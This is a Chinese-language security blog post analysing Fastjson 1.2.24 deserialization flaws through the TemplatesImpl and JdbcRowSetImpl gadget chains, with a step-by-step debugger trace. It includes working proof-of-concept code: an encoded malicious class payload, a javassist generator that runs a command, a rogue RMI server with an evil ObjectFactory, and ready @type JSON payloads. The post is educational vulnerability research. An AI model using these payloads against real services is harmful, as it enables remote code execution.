Fastjson 反序列化

Fastjson概述

Fastjson是阿里巴巴的开源库,用于对JSON格式的数据进行解析,能够快速序列化和反序列化。

一共有两条利用链:

1
2
3
TemplatesImpl

JdbcRowSetImpl

漏洞版本:fastjson 1.2.22-1.2.24

pom.xml

1
2
3
4
5
<dependency>
   <groupId>com.alibaba</groupId>
   <artifactId>fastjson</artifactId>
   <version>1.2.24</version>
</dependency>

Fastjson序列化

测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
package Test;

public class User {
    private String name;
    public User() {
        System.out.println("调用构造函数");
    }

    public String getName() {
        System.out.println("调用getName");
        return name;
    }

    public void setName(String name) {
        System.out.println("调用setName");
        this.name = name;
    }

    @Override
    public String toString() {
        return "User{" +
                "name='" + name + '\'' +
                '}';
    }
}

将对象标准序列化成JSON代码,并发现调用了set和get函数

image-20210813211312184

下面来看Fastjson自省模式下的序列化

image-20210813211337378

JSON.toJSONString()中多传入了一个SerializerFeature.WriteClassName,可以使Fastjson本身支持自省,生成的json序列化多了一个@type字段,它代表着对象类型。Fastjson的漏洞就是跟@Type有很大关系,让指定的类在反序列化时候去调用相应的get/set/is方法。

JavaBeanInfo#build中存在获取get/set方法名的一些满足条件(后面会分析到)

1
2
3
4
5
6
7
8
9
10
11
12
set:
	方法名以set开头
	长度不小于4
	非静态方法
	返回类型为void或者自己本身
	参数个数为1
get:
	方法名长度不小于4
	不能是静态方法
	方法名要get开头同时第四个字符串要大写
	方法返回的类型必须继承自Collection Map AtomicBoolean AtomicInteger AtomicLong
	传入的参数个数需要为0

image-20210813211528068

Fastjson反序列化

Fastjson反序列化有两种方法:JSON.parseObject()JSON.parse()

两种方法的返回对象有所不同。

parseObject 返回Fastjson.JSONObject类

parse 返回传入的类

image-20210813212009810

如果在parseObject()传入指定类的话,那二者的返回类便是一样的

image-20210813212018883

JSON.parseObject的底层调用的还是JSON.parse方法,只是在JSON.parse的基础上做了一个封装。

在序列化时,FastJson会调用成员对应的get方法,被private修饰且没有get方法的成员不会被序列化,而反序列化的时候在,会调用了指定类的全部的setter,publibc修饰的成员全部赋值

@type

上面提到过,Fastjson Autotype在处理json对象时如果未经安全处理,可以用@type指定类,在反序列化时候就会自动调用其set/get方法。

在构造的恶意类的set方法中添加命令执行

image-20210813212058597

本地生成JSON序列化时会调用set执行命令,但这只是攻击者的本地。

image-20210813212110883

下面我们用springboot起一个web服务,假设其中用parseObject()对传入的数据进行了Fastjson反序列化操作

image-20210813212148831

然后我们在直接用@type直接指定这个恶意的类,可以看见直接触发了set方法并执行了命令。

image-20210813212201009

image-20210813212207826

Fastjson TemplatesImpl链

TemplatesImpl相当于JNDI利用有更多局限。

服务后端的JSON解析要为

1
2
3
4
parseObject(input,Object.class,Feature.SupportNonPublicField)
parse(input,Feature.SupportNonPublicField)

//Feature.SupportNonPublickField是为了使Private成员反序列化规则同public成员。

验证漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
package Test;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class test {

    public static void main(String[] args)throws Exception{
        ParserConfig config = new ParserConfig();
        String text = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADIANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAtManNvbi9UZXN0OwEACkV4Y2VwdGlvbnMHACwBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAC0BAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQABdAcALgEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMAAgACQcALwwAMAAxAQAEY2FsYwwAMgAzAQAJanNvbi9UZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACwAAAA4AAwAAABEABAASAA0AEwAMAAAADAABAAAADgANAA4AAAAPAAAABAABABAAAQARABIAAQAKAAAASQAAAAQAAAABsQAAAAIACwAAAAYAAQAAABcADAAAACoABAAAAAEADQAOAAAAAAABABMAFAABAAAAAQAVABYAAgAAAAEAFwAYAAMAAQARABkAAgAKAAAAPwAAAAMAAAABsQAAAAIACwAAAAYAAQAAABwADAAAACAAAwAAAAEADQAOAAAAAAABABMAFAABAAAAAQAaABsAAgAPAAAABAABABwACQAdAB4AAgAKAAAAQQACAAIAAAAJuwAFWbcABkyxAAAAAgALAAAACgACAAAAHwAIACAADAAAABYAAgAAAAkAHwAgAAAACAABACEADgABAA8AAAAEAAEAIgABACMAAAACACQ=\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }}";
        Object obj = JSON.parseObject(text, Object.class, config, Feature.SupportNonPublicField);
    }
}

image-20210813212429074

完整POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
package Test;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.serializer.SerializerFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import javassist.*;

import java.util.Base64;

public class fast {

    //生成字节码
    public static String generateEvil() throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass clas = pool.makeClass("Evil");
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        String cmd = "Runtime.getRuntime().exec(\"calc.exe\");";
        clas.makeClassInitializer().insertBefore(cmd);
        clas.setSuperclass(pool.getCtClass(AbstractTranslet.class.getName()));

        clas.writeFile("./");

        byte[] bytes = clas.toBytecode();
        //base64
        String EvilCode = Base64.getEncoder().encodeToString(bytes);
        
        System.out.println(EvilCode);
        return EvilCode;

         
      
    }
    public static void main(String[] args) throws Exception {
        final String GADGAT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        //获取字节码
        String evilcode = fast.generateEvil();
        String PoC = "{\"@type\":\"" + GADGAT_CLASS + "\",\"_bytecodes\":[\"" + evilcode + "\"],'_name':'Teabo','_tfactory':{},\"_outputProperties\":{ }," + "}\n";
        JSON.parseObject(PoC,Object.class, Feature.SupportNonPublicField);

    }


}

image-20210813212629357

前半段javassist生成字节码和TemplatesImpl链CommonCollection-2中分析过,这里不再详细分析。

先解决几个疑问

1.为什么_bytecodes要Base64编码?

com/alibaba/fastjson/serializer/ObjectArrayCodec#deserialze()处调用了bytesValue()

image-20210813212904560

在其中便进行了base64解码操作

2._tfactory和_name为什么这样赋值?

在Common Collection2调过利用链,让他们非空是为了让链满足条件,继续运行下去。

3.为什么反序列化时候要加Feature.SupportNonPublicField?

开头说过这个字段是为了反序列化private属性的成员,而TemplatesImpl传入的成员就有private

image-20210813213206523

4.这个 _outputProperties 加进来是干嘛的?

这是漏洞利用的关键参数。因为Fastjson反序列化时候会调用getOutputProperties()方法

利用链分析

主函数parseObject下断点

image-20210813213332126

传入字段分别是json数据,Object.class和Feature参数

image-20210813213339579

进入JSON#parseObject()

image-20210813213351702

进入DefaultJSONParse方法

image-20210813213412701

image-20210813213417783

获取当前第一个字符,进入第一个if,将12赋值给lexer.token

image-20210813213430310

再次回到JSON.class,parseObject来解析传入的类

image-20210813213442918

刚才已经知道了lexer.token为12,所以直接调用getDeserializer

image-20210813213453284

这里根据我们传入的Type来寻找对应的反序列化器。

image-20210813213503837

在第一个if就直接return了

image-20210813213513219

返回到 DefaultJSONParser#parseObject()

image-20210813213527615

利用刚才返回的反序列化器对JSON进行反序列化

进入到deserialize,在最后进行了parse方法调用

image-20210813213556185

跟进到parse()

image-20210813213646905

switch进入12分支

image-20210813213656834

{ 下一个为 “所以进入该分支

image-20210813213704510

继续往下走,看到另外一个If

image-20210813213713741

我们的key是 @type,并且相应Feature配置没开启,所以满足条件

利用loadClass加载我们的类

image-20210813213747623

依然是获取反序列化器,这里的对象是TemplatesImpl

先进入getDeserializer()

因为TemplatesImpl找不到反序列化器,所以为Null所以进入第二个分支

image-20210813213812065

到达ParserConing#getDeserializer()

getName()获取了类名

image-20210813213837724

有个简单的黑名单,太简单了没啥用

image-20210813213856760

往下走,来到createJavaBeanDeserializer()

image-20210813213912779

调用build方法

image-20210813213924888

buidl会通过反射获取类的信息,并存放下来。上面也说过这里会对set和get方法名进行一系列判断。

image-20210813213951975

image-20210813213957710

注意在get的查找方法中,会遍历类的所有方法

TemplatesImpl#getOutputProperties()方法正好满足这些条件

image-20210813214013708

image-20210813214037267

保存添加这些数据并返回

image-20210813214131982

回到DefaultJSONParser

image-20210813214142912

进入JavaBeanDeserializer#derialize()

image-20210813214158391

token等于16,所以跳过很多if

这里循环赋值一些field属性,内容就是之前build时候实例化时候构造的.

image-20210813214215420

第一个就获取到了outputProperties

往下走到parseField()解析参数

image-20210813214238612

对参数key进行smartMatch()智能模糊匹配

image-20210813214301594

smartMatch()先是取反序列化器(null),再判断是否is开头,然后从sortedFieldDeserializers赋值变量。

image-20210813214333645

重点这里将key的 _- 给去除了,那么_outputProperties就变成outputProperties

image-20210813214446458

调用getFieldDeserializer方法

image-20210813214507423

sortedFieldDeserializers中找到包含getOutputProperties那组并返回

image-20210813214524079

返回到parseField方法,在最后调用了DefaultFieldDeserializer#parseField

image-20210813214542859

DefaultFieldDeserializer#parseField中对属性进行反序列化,并返回给value

image-20210813214606797

可以看到在setValue()中,经过取method属性后,method已经被赋值为getOutputProperties

image-20210813214626645

image-20210813214631117

然后在下面直接通过invoke反射触发了该函数,从而调动了TemplatesImpl

image-20210813214648768

接下来就是TemplatesImpl内部链的调用过程了,不详细分析了

image-20210813214712467

image-20210813214717095

image-20210813214722187

Fastjson JdbcRowSetImpl链

接着上面的TemplatesImpl链,这里分析JdbcRowSetImpl链。

前者的局限性较大,需要按照特定的格式传入特定的参数,后者所受限制就小了很多,只需要Json.parse(input)即可触发漏洞。

image-20210813215027458

​ (各方法JDK版本要求)

JDNI注入攻击流程:

1
2
3
4
5
客户端lookup的url可控
攻击者伪造恶意RMI服务,并指定该URL
恶意RMI绑定一个Reference对象,其中指定攻击者构造的Factory类
受害者在lookup()时,会动态加载并实例化Factory类,再调用factory.getObjectInstance()
攻击者在factroy中重写getObjectInstance()或静态代码块

详情分析请看JNDI注入

JdbcRowSetImpl链 影响版本 fastjson<=1.2.24

RMIServer:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
package Test;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) throws Exception {
        //System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

        Registry re= LocateRegistry.createRegistry(1099);

        //设置外部对象引用,绑定恶意对象名与对象远程引用地址
        Reference reference=new Reference("evil","evil","http://127.0.0.1:5599/");
        ReferenceWrapper reWrapper=new ReferenceWrapper(reference);

        //rmi绑定Reference对象
        re.bind("Teabo",reWrapper);
        System.out.println("Running rmi://127.0.0.1/Teabo");
    }
}

evil.java:

(编译后放在请求目录下)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class evil implements ObjectFactory{
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        System.out.println("Hack");
        //命令执行
        Runtime.getRuntime().exec("curl 127.0.0.1:5599");
        Runtime.getRuntime().exec("calc.exe");

        return null;
    }
}

攻击者:

1
2
3
4
5
6
7
8
9
10
package Test;

import com.alibaba.fastjson.JSON;

public class fast2 {
    public static void main(String[] arges)throws Exception{
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/Teabo\", \"autoCommit\":true}";
        JSON.parse(PoC);
    }
}

image-20210813220908037

1
2
3
4
5
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1/Teabo", "autoCommit":true}

@type指定的类是com.sun.rowset.jdbcRowSetImpl
用dataSourceName指定RMI注册中心绑定的服务对象
根据两个字段,Fastjson会在反序列化时分别调用setDataSourceName和setAutoCommit方法

利用链分析

JSON.parse()下断点

image-20210813215753621

中间的Fastjson链分析同上面TemplatesImpl的分析过程,所以这里我们直接在DefaultFieldDeserializer#parseField下断点

image-20210813215900440

setValue()里同样有invoke反射执行的操作

image-20210813215918410

首先是反射执行setDataSourceName方法

该方法对dataSource赋值为我们的rmi地址

image-20210813215934537

image-20210813215939400

再次回到setValue()方法,这次反射调用的是JdbcRowSetImpl#setAutoCommit

image-20210813215953914

image-20210813215957675

调用了connect()

image-20210813220009710

这里直接就调用了lookup(),并且其中的URL正是刚才通过setDataSourceName赋值的RMI服务地址,造成了JNDI注入。(lookup之后发生了什么,详情请看JNDI注入

image-20210813220059945

参考文章

https://www.cnblogs.com/nice0e3/p/14601670.html

https://www.freebuf.com/vuls/178012.html

https://mp.weixin.qq.com/s/30F7FomHiTnak_qe8mslIQ

https://www.cnblogs.com/nice0e3/p/14776043.html

https://mp.weixin.qq.com/s/1zUihQl8gw-UlO8FH97ukw

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗